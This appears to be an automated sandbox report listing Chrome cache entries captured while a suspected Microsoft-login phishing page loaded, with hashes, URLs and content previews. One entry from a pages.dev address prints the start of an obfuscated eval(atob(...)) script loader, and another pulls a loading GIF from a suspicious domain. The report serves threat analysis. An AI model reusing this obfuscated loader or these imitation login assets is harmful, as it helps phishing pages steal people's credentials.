Preview:	/! jQuery v3.6.4 \| (c) OpenJS Foundation and other contributors \| jquery.org/license /.!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(C,e){"use strict";var t=[],r=Object.getPrototypeOf,s=t.slice,g=t.flat?function(e){return t.flat.call(e)}:function(e){return t.concat.apply([],e)},u=t.push,i=t.indexOf,n={},o=n.toString,y=n.hasOwnProperty,a=y.toString,l=a.call(Object),v={},m=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType&&"function"!=typeof e.item},x=function(e){return null!=e&&e===e.window},E=C.document,c={type:!0,src:!0,nonce:!0,noModule:!0};function b(e,t,n){var r,i,o=(n=n\|\|E).createElement("script");if(o.text=e,t)for(r in c)(i=t[r]\|\|t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.removeChild(o)}funct

Chrome Cache Entry: 152

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (65447)
Category:	downloaded
Size (bytes):	89795
Entropy (8bit):	5.290870198529059
Encrypted:	false
SSDEEP:	1536:IjjxXUHunxDjoXEZxkMV4PYDt0zxxf6gP3f8cApoEGOzZTBqUsuy8WnKdXwhLQvg:IeeIygP3fulzhsz8jlvaDioQ47GKH
MD5:	641DD14370106E992D352166F5A07E99
SHA1:	EDA46747C71D38A880BEE44F9A439C3858BB8F99
SHA-256:	A0FE8723DCF55DA64D06B25446D0A8513E52527C45AFCB37073465F9C6F352AF
SHA-512:	A6E981B23351186AA43F32879DD64C6801BE6E2AF7EF8B0E472CCCDEEBA52D5D7894DE4BCB292A364F1E11E525524077534338140A72687ADA4FAE62849843A5
Malicious:	false
Reputation:	low
URL:	https://ajax.googleapis.com/ajax/libs/jquery/3.6.4/jquery.min.js
Preview:	/! jQuery v3.6.4 \| (c) OpenJS Foundation and other contributors \| jquery.org/license /.!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(C,e){"use strict";var t=[],r=Object.getPrototypeOf,s=t.slice,g=t.flat?function(e){return t.flat.call(e)}:function(e){return t.concat.apply([],e)},u=t.push,i=t.indexOf,n={},o=n.toString,y=n.hasOwnProperty,a=y.toString,l=a.call(Object),v={},m=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType&&"function"!=typeof e.item},x=function(e){return null!=e&&e===e.window},E=C.document,c={type:!0,src:!0,nonce:!0,noModule:!0};function b(e,t,n){var r,i,o=(n=n\|\|E).createElement("script");if(o.text=e,t)for(r in c)(i=t[r]\|\|t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.removeChild(o)}funct

Chrome Cache Entry: 153

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 915
Category:	downloaded
Size (bytes):	263
Entropy (8bit):	7.109710006180472
Encrypted:	false
SSDEEP:	6:Xt45qzoyr7SEpx2nsOcigQRwU9EEXBBLVtGuDNZjg/BW7/:Xm5qz7ShsBig8fj3TjgJY
MD5:	FDADF2FE6A40F8745A54088F002AECA2
SHA1:	CE8A4413ABA3B2035EF4C48D46D76EABE4DDA4B0
SHA-256:	AA6593B23F2559FE0C239B25F9AD9B2BC79437AE5EE23E412E13D148AB5B6B86
SHA-512:	CD99227F63AB606911AAC42BBDD132FF1AC0B243C64288BB23B8B44F54FEEF3D130882B21E3402C22C45FF5DD15D0CF16494A66FB1896AA46D95ACAF999EE837
Malicious:	false
Reputation:	low
URL:	https://aadcdn.msauth.net/shared/1.0/content/images/ellipsis_grey_2b5d393db04a5e6e1f739cb266e65b4c.svg
Preview:	...........S.n. ...D.,CM...Rz...f)...,(........CY....yo$....~....1....1F.+v...3..t...a.X(....c......n1 @B..[.\........d.]...&..t...->.&dE..w.K6h2#.)..R1...Tr.%.@.].b.9...M.3.~.y.D..WHh.0..n.A..f....:.m...K3.C..=y.).......J.J........j!.."......~.5$......

Chrome Cache Entry: 154

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	HTML document, ASCII text, with very long lines (2625), with CRLF line terminators
Category:	downloaded
Size (bytes):	2746
Entropy (8bit):	5.662699011540304
Encrypted:	false
SSDEEP:	48:t1XXw+kOhX/BxVgnK/Q6GiuGq9juwbae13NhcKBLd41KWQ9QrsTADr0irR5fIIQ/:H9W3iuV96wDrHBZ4UjjTADoirR5Qn/
MD5:	F2002B860088C153A796B41E19B52691
SHA1:	799728F957E9E9318D93954F4A7216E1A7FFBEB4
SHA-256:	43CE77146A279391847C20E3ECF0F4F26A9D452A9988260E7182453111F4664B
SHA-512:	EEE6CFDE43D588673ACD6879238D6DEDEA1BDA5EC5CC7AFAE4CC62209ADAE9EF870F86999589C29A4E97C3E22D34CD18FDE1EDFEB2AE4B15AFCDE4F2310F1DCC
Malicious:	false
Reputation:	low
URL:	https://fpt2.microsoft.com/Clear.HTML?ctx=Ls1.0&wl=False&session_id=b58882512b7c40d78c42f4d88f1affac&id=b3052510-90dd-52cb-7580-9c4ed5cb36fa&w=8DCCA0FF123E6EF&tkt=taBcrIH61PuCVH7eNCyH0J9Fjk1kZEyRnBbpUW3FKs%252bPBIIe5UPfX%252fdCN4xorunpDaUx8d6T2Sy5nsqmpG4qpaE64KjG8k5m55Tu7wCV3pS5XDm0jMpOmbcjUStMLy6OIPAsPYiVynnbiQCj%252fvMiJ8nOarRWT2n%252bbtQrqdEOWamE25rSJSI8Dg0gtfk3tlrYkFvuklxY4xcTBNkuVsgQ7C6rm2DLAlCRgvyWUkX8e12dcnJ6j91Lts1wBrbikiB6QMyQdBf4L5q80Qh6lBclSq7ANW%252fgUyoinMrNK%252bqYEzCfKyzgbAJAKuYWGLRLrxEZ&CustomerId=33e01921-4d64-4f8c-a055-5bdaffd5e33d
Preview:	<!DOCTYPE html>..<html xmlns="http://www.w3.org/1999/xhtml">..<head>.. <title></title>..</head>..<script>function BaseStamp() { this.GetStorageQsInfo = function () { if (window.localStorage) { var n = window.localStorage.getItem(lsKey); var lsupd = "False"; if (lsupd === "true" && n) { var xhr = new XMLHttpRequest(), method = "GET", url = target + "updatels.html?ofid=" + n + "&session_id=" + sid + "&CustomerId=" + cid; xhr.open(method, url, true); xhr.onreadystatechange = function () { if (xhr.readyState === XMLHttpRequest.DONE && xhr.status === 200) { var update = xhr.responseText; if (update && update.toLowerCase() === "true") { window.localStorage.setItem(lsKey, id); } } }; xhr.send(); } if (n && n != null && n != "" \|\| (window.localStorage.setItem(lsKey, id), n = id), id != n) return "session_id=" + sid + "&CustomerId=" + cid + "&fid=" + id + "&ofid=" + n + "&w=" + ticks + "&auth=" + encodeURIComponent(authKey) } return "" }; this.newXMLHttp = function () { var n = null; return

Chrome Cache Entry: 155

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (17527), with CRLF line terminators
Category:	dropped
Size (bytes):	19183
Entropy (8bit):	6.1371082440115075
Encrypted:	false
SSDEEP:	384:eOPZ0j1RQTqbGOe4hacHGF6Q8QqoL11VvpoKw1oPjF12NQKLOKx2WSAI2v:ehjQTqbG2dHGsp+TVvyjIBKL/FcE
MD5:	C69BC69003105B2B051AB2D11E59C2C7
SHA1:	DF19B5D9568E24C9C3FD74A8E76B6AEFFB9C49BF
SHA-256:	9808503F6D4D8C80E656A3AB96DA9D57AA91DBA35AC51F77F028DBC4760ED8BC
SHA-512:	EDFCC7915314277B7187ECB1539233ECD6FF24A963CE37C93D571092C809994F4C1FA6D228D4495DD9FC2BD67013D71FC8C2251839EA3FA278DB0EB1D5339A7B
Malicious:	false
Reputation:	low
Preview:	<div id="hbg" style="width: 100px;margin: 0 auto; 0 auto;visibility:hidden;">..<img style="width: 100%;" src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAMgAAAC5CAYAAABtJnD6AAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsIAAA7CARUoSoAAADLFSURBVHhe7X0JlF1Heebf6l3dUmtt7bssW5IXyRteRmCMIdgmDNsMYJyQnMQBkwQSkjOcMRmGsDg5IROWIQkMMIlDMJCFkBBIYMCGAMYLtmXZ8ibv2ltLt9Qt9d5vvq9u1e269ered+97vbx+fb/T1bfqr7+2W/Xdqr/u8iRHjhzxqNPH2Yd33bVRCoVd8G2Da4crUJyjJnAabo/U1f2HfP7aQ4GoPMw+grzrB2tlrPBR+N4CN1fJctQqekCSO2TOnI/I5155UssyYXYR5F13vVLGxr4GX2cgyDFLsA/uzfKF6x4NgukxewjyGz+4DEuqu+DjcirH7MMBzCS7sOR6QYdTYY4+1jZu/WELyPEF+HJyzF6sxhj4c+1PjdlBkNHRt+P/RUEgx6xFoXADVhKv0qFUmB0EKRRIkBw5iLfpYyrUPkHeffdC/D8/COSY9SgULpXfvz/1uJ8NM0gH3PzAmyOHLJbTvW3aXxK1T5C6utl7MzSHD3WYRVKPidlhg+TIUSZyguTIkYCcIDlyJCAnSI4cCcgJkiNHAnKC5MiRgJwgOXIkICdIjhwJyAmSI0cCcoLkyJGAnCA5ciQgJ0iOHAnICZIjRwJyguTIkYCcIDlyJCAnSI4cCaj9l4luvXuDjIw8KgVJ/RZZ1aAwAz/2OKaP1YsDcNvlr17Dry+WRO0T5L0/A0FG+cGwmUWQlnqRJriZxBGuR9oaq31UHUD9tsttO3OCKNz2xAYp1IEgdTOHIGNg

Chrome Cache Entry: 156

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 108310
Category:	downloaded
Size (bytes):	19750
Entropy (8bit):	7.976252716935333
Encrypted:	false
SSDEEP:	384:8ky75Q+ucD5YzpUA/ploZvOqPL0paizPdtqM4vqy8FT53oJB8e8JO:8ky7TucDqUAb3Zrd1AfA53oD8XJO
MD5:	FFB1F8211D580070470EA800670D93D5
SHA1:	E53659646AEEA3BEF3765BE84F2E9153B5A0EEE2
SHA-256:	4577B35C16D4BEECEF87C6934E98D1F3BEDA07F38B7ED1AFF544B2F589E494DD
SHA-512:	D5F203FCF25D628EF8CA2A6CB0A8C82453A6A3FD73A22A9E625E9219A0CAA1938C29BBD4F426CEE5A5E8C3A3E3272F0D5A625A755E236173B6CB03070B52BE7D
Malicious:	false
Reputation:	low
URL:	https://aadcdn.msauth.net/ests/2.1/content/cdnbundles/converged.v2.login.min_wixdbz3ubznoegxpcgkfog2.css
Preview:	...........}k..6..w...\.d%E......q.d..lg..rmq$...KR3.....x..4 j<.........h..4..7.......^6...\|^.uy..jSVi...^..(".TGUVg.M..E.\|..7.z.m.....g.>Do~.>.\|...-..G...../..T.=...../...{...".QYE.z.j....].i.]U.j.Y.......E^7$.eV....B.ZDo..........$...$.\.g]6.<....Q+....z.U..2./...l..MQ.%.f..(......%.G/zO1....K..:..M. ..XC..+&.R..4..)..].TB...5..5etWnE.u{..uD...Y94].#UXl.M.h&..RE.!%A.....G...A....J..8"....U.n:.y..zy.....kY'...l.............u-4......e..M.n.uZ..Ao..>xY..v........\|.>z....4J.. .p.7D...b=...-.J^.1T..3.K...Q.(.U4_..u..M.w.&.j.7..4_S.L...L&..[.^T.H..y.R9-.......5....'.E..SV."K.G..i..E...r....9.&..vA. .E..E.4;W.G..&-...D.r._..3....t.e'Z...!.5Md...v\|K........^qe..{pIyC..,.i..RX...~t.....Y..e.DjIh.E...i...z....3......\|F..`..*@.....L0......$..._7D...s...I..._D.....o.....Go...../~.N..'.'..o..~~...`.{...cb....G......D/......7..].z....I.x.../?\..)...#.;zyA.....&...R./.Sb.^.{.3.\|.......<....kJ..7.gl..x...g...{....R......?.#..

Chrome Cache Entry: 157

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 915
Category:	dropped
Size (bytes):	263
Entropy (8bit):	7.109710006180472
Encrypted:	false
SSDEEP:	6:Xt45qzoyr7SEpx2nsOcigQRwU9EEXBBLVtGuDNZjg/BW7/:Xm5qz7ShsBig8fj3TjgJY
MD5:	FDADF2FE6A40F8745A54088F002AECA2
SHA1:	CE8A4413ABA3B2035EF4C48D46D76EABE4DDA4B0
SHA-256:	AA6593B23F2559FE0C239B25F9AD9B2BC79437AE5EE23E412E13D148AB5B6B86
SHA-512:	CD99227F63AB606911AAC42BBDD132FF1AC0B243C64288BB23B8B44F54FEEF3D130882B21E3402C22C45FF5DD15D0CF16494A66FB1896AA46D95ACAF999EE837
Malicious:	false
Reputation:	low
Preview:	...........S.n. ...D.,CM...Rz...f)...,(........CY....yo$....~....1....1F.+v...3..t...a.X(....c......n1 @B..[.\........d.]...&..t...->.&dE..w.K6h2#.)..R1...Tr.%.@.].b.9...M.3.~.y.D..WHh.0..n.A..f....:.m...K3.C..=y.).......J.J........j!.."......~.5$......

Chrome Cache Entry: 158

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 3651
Category:	downloaded
Size (bytes):	1435
Entropy (8bit):	7.8613342322590265
Encrypted:	false
SSDEEP:	24:XjtSZi0kq+yVCGYXVrO4vDxik/N/z5VaLPbholJvf6dblke68eRZJyBDz3BnZcNX:XgDkpyVCGca4b//9z5oPXdbl9688qRzY
MD5:	9F368BC4580FED907775F31C6B26D6CF
SHA1:	E393A40B3E337F43057EEE3DE189F197AB056451
SHA-256:	7ECBBA946C099539C3D9C03F4B6804958900E5B90D48336EEA7E5A2ED050FA36
SHA-512:	0023B04D1EEC26719363AED57C95C1A91244C5AFF0BB53091938798FB16E230680E1F972D166B633C1D2B314B34FE0B9D7C18442410DB7DD6024E279AAFD61B0
Malicious:	false
Reputation:	low
URL:	https://aadcdn.msauth.net/shared/1.0/content/images/microsoft_logo_ee5c8d9fb6248c938fd0dc19370e90bd.svg
Preview:	...........WMo.7..+..uV.HJ...{..........&..v...(Q.F.....aW.Q.\|..~.\|{~...b{8...zv.....8\|...b.gxb.y{.x<\lS...p...p..l7...o.}.v.....t.........r..r.\|9?.......HP...r.4.aGA.j....7.!....K.n.B.Z.C.]....kj..A..p...xI...b..I!K..><.B..O....#...$.]h.bU.;.Y...).r.u....g.-w.2..vPh....q....4_..N\..@y).t{.2pj.f..4h.....NC.....x.R..P..9.....".4.`%N..&...a.@.......fS)A4.F..8e9KHE....8d.CR.K..g..Q.......a....f.....dgN.N.k..#w..........,.".%..I.q.Y.R]..7.!.:.Ux...T.qI..{..,b..2..B...Bh...[o..[4....dZ.z.!.l....E.9$..Y.'...M.,p..$..8Ns3.B.....{.....H..Se3....%.Ly...VP{.Bh.D.+....p..(..`....t....U.e....2......j...%..0.f<...q...B.k..N....03...8....l.....bS...vh..8..Q..LWXW..C.......3..Pr.V.l...^=VX\,d9f.Y;1!w.d,.qvs....f;.....Zhrr.,.U....6.Y....+Zd.R...but....".....4.L...z........L.Q......)....,.].Y.&....*ZsIVG.^...#...e..r....Z..F..c..... .QDCmV..1.~...J9..b_Oov\..X.R..._.TqH.q.5G.0{ZphQ..k...s..\.../.Dp..d`#......8.#Y...Mb.j.Q......=n4.c....p.[.SI.....0.N.

Chrome Cache Entry: 159

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 900
Category:	downloaded
Size (bytes):	252
Entropy (8bit):	7.057986237150363
Encrypted:	false
SSDEEP:	6:Xth1WIxjFLw0cb88da94jE0CadKSPfN8IC6a8r0ADAgvw9xwi:Xf1WMlcb5a92EGZa6JmUUxh
MD5:	19AA49E6F345811CEBE895003C8FCFC7
SHA1:	48D93BEDEFFE842A3DFB5D3036D14178D97115F9
SHA-256:	F61DC276446B263FC29B1A8CE20D8BFD2C028F4603356F795687B942E3B4969F
SHA-512:	6A2E4E29D0FDBFD0E671A88CB6411AA7401524C3DDF903AB8E766B4CD66C9C31E0D175592920D29D3CF0CD67D6FA6763F6A0D4A5286EEC48F77028A36054E642
Malicious:	false
Reputation:	low
URL:	https://logincdn.msauth.net/shared/1.0/content/images/ellipsis_635a63d500a92a0b8497cdc58d0f66b1.svg
Preview:	...........S.. ...q.cl.&...}.....1..Uj?.jR..&......8..h.G....jl..n8.!.P...+....Fa8x[c.0...[?..........'n....kZ.:...w..z..5..&dA.+..1h2".!..R1(.t..SJ.N+......VV._...y.D_..3"4...e;. ]RA...r..VR-..I..DO.9Y...a{A\&.xr{.H.K\...f.?.7&}..........

Chrome Cache Entry: 160

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 901881
Category:	dropped
Size (bytes):	231091
Entropy (8bit):	7.998390937544825
Encrypted:	true
SSDEEP:	6144:Z4w6J4OiKySVPhKwGX9rZUKsSqNNZPRNSBX:awkViKySV5KXX9mBS0NZZYX
MD5:	05A20B73D23C52A09386F3222045E62D
SHA1:	0991D7FD9A84F82DD39FBE065C0070D3196F497C
SHA-256:	BAB90DCF5FE87AB6DDEED7339CC36967BA7188CE3E01CCF7C65D9369056C41A4
SHA-512:	F93017FD9AC4A684D5BBC5BD44992D9687DDA5011050B9F7AA1718EA99F91E5BB7031854461E48316D10D095347E5953F376949EFCC57348980D792AD745BFCE
Malicious:	false
Reputation:	low
Preview:	...........iw.8.(.....n....dg...M....l.'.N.}}h...H...8.....+E9.g.g.{&...A.K..T.j..........r#.Fy1K.4.6.S.@V)..:...QrV..S...,./....::hW_......6G.l.....yRlHQ.L.".i\|..nw.ndJ....+..j.."..](..<..L..p?...zw9.e.....\{..C9J...M...9-....U2..cY=...."=....a...."/.3.../iF.9d..T.%.:S.Ne6.&.h.W...t....../f2.J~H.K.,..n......z6O....n..4.Z..ll...^..Z..F.N.r.CV?.....=.......r...rt........:...:..8!$(..g..A.Z.Lb%....B.....t>VZ.y....Y>-...SY..t^..:%..Yz=.c.o..'...</.26 ..!{x....bt6nm.......,.x.da/...7.x.........&......$N.......=X.........~.PL.No.(i3....'..Y..ONz..f......[[.%f[[3JL........x.d.,.U..U..:....:0.......),..Kq.o..}oI....N..W..t~+...Y..j....h..,....m.T.J.e..RB..._..b.u.ql.7u.Nz_.-2..li.......`.`O+..1h.2..S.+..F.:...l.M...t.6..B.".;u...T.g.t....@..[-.Q........b..P..<...TLm.2...K%.e6p:....]S.`Q..S.....m.#Ur..w#x....CUl.V.M.N.i.....Tv.....8k,2M.^."..ec..i>..Z...a..a.8...{_\4.,d9.33k...y...,U..vU..u..]N.# ~..bk+[L...$oUl..^y..f.;..).<R...a..?..g.?

Chrome Cache Entry: 161

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 1864
Category:	dropped
Size (bytes):	673
Entropy (8bit):	7.6596900876595075
Encrypted:	false
SSDEEP:	12:Xl0t8TUViiYi5m6FhSBXWPsigK99WCqKMvBBFThSqfLd81CK6bC+k7LqZLsFlD:XFUVpkNK0Rwid81p6btk7LqZ6D
MD5:	0E176276362B94279A4492511BFCBD98
SHA1:	389FE6B51F62254BB98939896B8C89EBEFFE2A02
SHA-256:	9A2C174AE45CAC057822844211156A5ED293E65C5F69E1D211A7206472C5C80C
SHA-512:	8D61C9E464C8F3C77BF1729E32F92BBB1B426A19907E418862EFE117DBD1F0A26FCC3A6FE1D1B22B836853D43C964F6B6D25E414649767FBEA7FE10D2048D7A1
Malicious:	false
Reputation:	low
Preview:	...........U.n.0....}i..P..C..7l/..d........n...G....yl. .E.......Tu.F.........?$.i.s..s...C..wi$.....r....CT.U.FuS..r.e.~...G.q.....~M..mu}.0.=..&.~.e.WLX.....X..%p..i......7+.........?......WN..%>...$..c..}N....Y4?..x.1......#v...Gal9.!.9.A.u..b..>..".#A2"+...<qc.v....)3...x.p&..K.&..T.r.'....J.T....Q..=..H).X...<.r...KkX........)5i4.+.h.....5.<..5.^O.eC%V^....Nx.E..;..52..h....C"I./.`..O...f..r..n.h.r]}.G^..D.7..i.].}.G.].....{....oW............h.4...}~=6u..k...=.X..+z}.4.].....YS5..J......)......m....w.......~}.C.b_..[.u..9_7.u.u.....y.ss....:_yQ<{..K.V_Z....c.G.N.a...?/..%. .-..K.td....4...5.(.e.`G7..]t?.3..\..... ....G.H...

Chrome Cache Entry: 162

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 915
Category:	downloaded
Size (bytes):	263
Entropy (8bit):	7.109710006180472
Encrypted:	false
SSDEEP:	6:Xt45qzoyr7SEpx2nsOcigQRwU9EEXBBLVtGuDNZjg/BW7/:Xm5qz7ShsBig8fj3TjgJY
MD5:	FDADF2FE6A40F8745A54088F002AECA2
SHA1:	CE8A4413ABA3B2035EF4C48D46D76EABE4DDA4B0
SHA-256:	AA6593B23F2559FE0C239B25F9AD9B2BC79437AE5EE23E412E13D148AB5B6B86
SHA-512:	CD99227F63AB606911AAC42BBDD132FF1AC0B243C64288BB23B8B44F54FEEF3D130882B21E3402C22C45FF5DD15D0CF16494A66FB1896AA46D95ACAF999EE837
Malicious:	false
Reputation:	low
URL:	https://logincdn.msauth.net/shared/1.0/content/images/ellipsis_grey_2b5d393db04a5e6e1f739cb266e65b4c.svg
Preview:	...........S.n. ...D.,CM...Rz...f)...,(........CY....yo$....~....1....1F.+v...3..t...a.X(....c......n1 @B..[.\........d.]...&..t...->.&dE..w.K6h2#.)..R1...Tr.%.@.].b.9...M.3.~.y.D..WHh.0..n.A..f....:.m...K3.C..=y.).......J.J........j!.."......~.5$......

Chrome Cache Entry: 163

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	HTML document, ASCII text, with very long lines (13037), with no line terminators
Category:	downloaded
Size (bytes):	13037
Entropy (8bit):	5.540756773014774
Encrypted:	false
SSDEEP:	384:8nfqJsUfrCot8B+EA8F4C9D2ang95kI4WO55M:rJxrCo++EfyC52agvb4WO5a
MD5:	9E280072BF3FF50BD23649BBAD888639
SHA1:	1A8A94F48DEB1E52BD3BED8D1BC157C9CA96D7FA
SHA-256:	8A43A76708766C0B7A9AE5F6044E30EB56BF4A9665530E5F2F3335AD30BE96E0
SHA-512:	86D2EF94C412F553A0DB77FE36BB0C475424E38F82781A7348AFA1799588BDEB764A2294AE5FDFAF921B6A115EF54A21E21D20008CD270814B1AEAA0E51BEEB9
Malicious:	false
Reputation:	low
URL:	https://palisades-observatory-3aea66138e00e57e9f-5677ed4549f19c25.pages.dev/890f5e421912d83086e5dcc2/86b1d9943b8c18420153e7/?c69r153=itqf80n&8ls1t3xz=e96619c0f41e457dc67526ff68a2&5tw8bsx7e=87dc22878e019397c649b8
Preview:	<!DOCTYPE html><html><head><meta charset="UTF-8"></head><body><script>var pjqtanecgkilf = 'dzv1pqgzxa6275te';eval(atob("xmYdsnimIyGkyXIGUZhijYadmFyIG9iPScnLHo9QXJyYXkoMTY0KTt6WzUyXT0iY0ZsVGFsWk5ZbFJHZDFsdGF6RmpWMDQxU1dwME5sZDZZM2hZVkRCcFUyNUNhV0pYVCI7els4N109ImtSM2hNWlZoT2QxcFVUbUZoUjA1d1VXNVdVVmREU1RkbGJITXdUa1l3T1VscmVIUmgiO3pbMTU5XT0iMU1FeHRPWGRhVnpSdlNXNVNiR1ZJVVhaaFNGSjBZa05KYzBsRFNubGFXRUp6V1ZkTyI7elsxMzNdPSJuSlphazVxWkZkS1NFOVhjRnBYUmtwM1dXcEpNR1JYVFhsV2JXaHFZbFUxZGxSNlNuIjt6WzExMV09IlNkbUZXVmtaUFZsSlhVVEJzZWxkclpFZE5RMGszWld4ek1rMUdNRGxKYlVwSVQxZHciO3pbMTQ5XT0ia2hpUkVKc1ZrYzVjRWxxZERaWGVtZDVXRlF3YVZSc2FHOWtWbkJZV1ROd1QySnRPVyI7els2M109ImtUR0ZVYUU5Uk1qUjNZMFU1TTAxRmRHRmliRm94U1dwME5sZDZaR1JRVTBwTFRUSkciO3pbMTAxXT0ibGxUYms1V1VqQmFOVlp0TVVkak1IUkVZa1JrYTJKVldqVlRWV013VDFWc2NGTllUbSI7elszNl09ImN6TlBSakE1U1d0NFNGSlViRTFXUlZadlZVWm9VbUpWY0hWVFdGWnFUVEZhY0ZsNlQiO3pbMTAwXT0iWjNkVlJrNVNZakJzZEdKSVVtRmxWV3gzU1dwME5sZDZZekpZVkRCcFdWVlZOV1ZXVyI7els3OF09IlZvVW1OSFRuUldha0pyVjBOSk4yVnNjekJOY

Chrome Cache Entry: 164

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	72
Entropy (8bit):	4.241202481433726
Encrypted:	false
SSDEEP:	3:YozDD/RNgQJzRWWlKFiFD3e4xCzY:YovtNgmzR/wYFDxkY
MD5:	9E576E34B18E986347909C29AE6A82C6
SHA1:	532C767978DC2B55854B3CA2D2DF5B4DB221C934
SHA-256:	88BDF5AF090328963973990DE427779F9C4DF3B8E1F5BADC3D972BAC3087006D
SHA-512:	5EF6DCFFD93434D45760888BF4B95FF134D53F34DA9DC904AD3C5EBEDC58409073483F531FEA4233869ED3EC75F38B022A70B2E179A5D3A13BDB10AB5C46B124
Malicious:	false
Reputation:	low
Preview:	{"Message":"The requested resource does not support http method 'GET'."}

Chrome Cache Entry: 165

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	6
Entropy (8bit):	2.584962500721156
Encrypted:	false
SSDEEP:	3:fCu:au
MD5:	AAAB7A355103063D9EEB4824A3A6B374
SHA1:	E51555F02C32321F3E48F07A0FA5AF46DF835BFC
SHA-256:	79BA862622D6FA84AC7E4F98EB95043A255FC2C81711E9400A8AA4D4B1608471
SHA-512:	D1A0C9C4F628459F5CA904405B2A66A69425A50E8DCE1BAA43161D784EB219BD3E1FD9447BCBACC314652EDA08CF0B02C863C87F3AC1534AE0F62A414C191F1B
Malicious:	false
Reputation:	low
Preview:	dfp:OK

Chrome Cache Entry: 166

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	GIF image data, version 89a, 100 x 100
Category:	downloaded
Size (bytes):	68682
Entropy (8bit):	7.902659665512124
Encrypted:	false
SSDEEP:	1536:tLKlVYQDckxy/+39MtKNAuavoCEjZ1+q0IfrFs5tfoFkkMMECVgQqYy75:t2gQ9U+T+r755oGkVbVs7
MD5:	9643BA737D9091D6252BF5812310AF61
SHA1:	4714C1BE53C997289819B17C91E3A4FD0030A42C
SHA-256:	3C21E22B282A0A65B6B07871D20856FB062DA3B5E1D481564379249BC2071235
SHA-512:	0C48221C7C8F4B30B921BAE1B4FC2843CBC01C82BE62DBDE4993E0068B3A5C782D73291EA53CF5586DF3D428736BB2CC382D37574EEBE131AB6B1611038C667E
Malicious:	false
Reputation:	low
URL:	https://theextrenalfiles.filesdistributorin.online/thegifloader/loading.gif
Preview:	GIF89ad.d..........DBD...$"$dbd............TRT...424trt............LJL...,,ljl............\Z\...<:<\|z\|............DFD...$&$dfd............TVT...464tvt............LNL...,.,lnl............\^\...<><\|~\|......!..NETSCAPE2.0.....!.....>.,....d.d....@..#,....q.\..M..H.Z..+..ym...z...J..,%'.c..iu...7.....drJs..HU{S..wqr..P~jn.K.HO.....p\.N~[.N}.f.f..o...vp.TSM............Y...b.G..Z..t...e.w..i..{.......t.a..L]..vc.H..&.X..m...Bu..............D..5..&..oRn.P....h.>..'.d.]i.\.0........IeDRsr.z.H...;s.<9..M..,...C.PB..-{g.d+.,..b.SbN.11l.G.kJ..&....&.[....b.F.5>P..l..r....U.O....}.!&..SY...n....Mf..Q.dN..).&.yl...WU.CH..DEroa9)b.0.u6B.._.s&.D^..#f..GL.7.?B...\..?..d0Y.W.x..........,.w.C."....s.+.G)5..~D`.OrG..@L%.S.(....E.F.....w.e.dX.Zf.<..p.`r..........N...(........ph..(0....s.%/\0..+.......R.q..+)A..m.=.....0....G.....C.'`S.......#d9..#. `I7.n8d...h...oj.%..xf..6..&.<x.#V.ng.{..0.Np.e.<.......9...W........5...........h.o.w+%3H.(.;.)a.E.0..Z.p.j..1.\.........u..bGQ

Chrome Cache Entry: 167

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 1864
Category:	downloaded
Size (bytes):	673
Entropy (8bit):	7.6596900876595075
Encrypted:	false
SSDEEP:	12:Xl0t8TUViiYi5m6FhSBXWPsigK99WCqKMvBBFThSqfLd81CK6bC+k7LqZLsFlD:XFUVpkNK0Rwid81p6btk7LqZ6D
MD5:	0E176276362B94279A4492511BFCBD98
SHA1:	389FE6B51F62254BB98939896B8C89EBEFFE2A02
SHA-256:	9A2C174AE45CAC057822844211156A5ED293E65C5F69E1D211A7206472C5C80C
SHA-512:	8D61C9E464C8F3C77BF1729E32F92BBB1B426A19907E418862EFE117DBD1F0A26FCC3A6FE1D1B22B836853D43C964F6B6D25E414649767FBEA7FE10D2048D7A1
Malicious:	false
Reputation:	low
URL:	https://logincdn.msauth.net/shared/5/images/2_bc3d32a696895f78c19d.svg
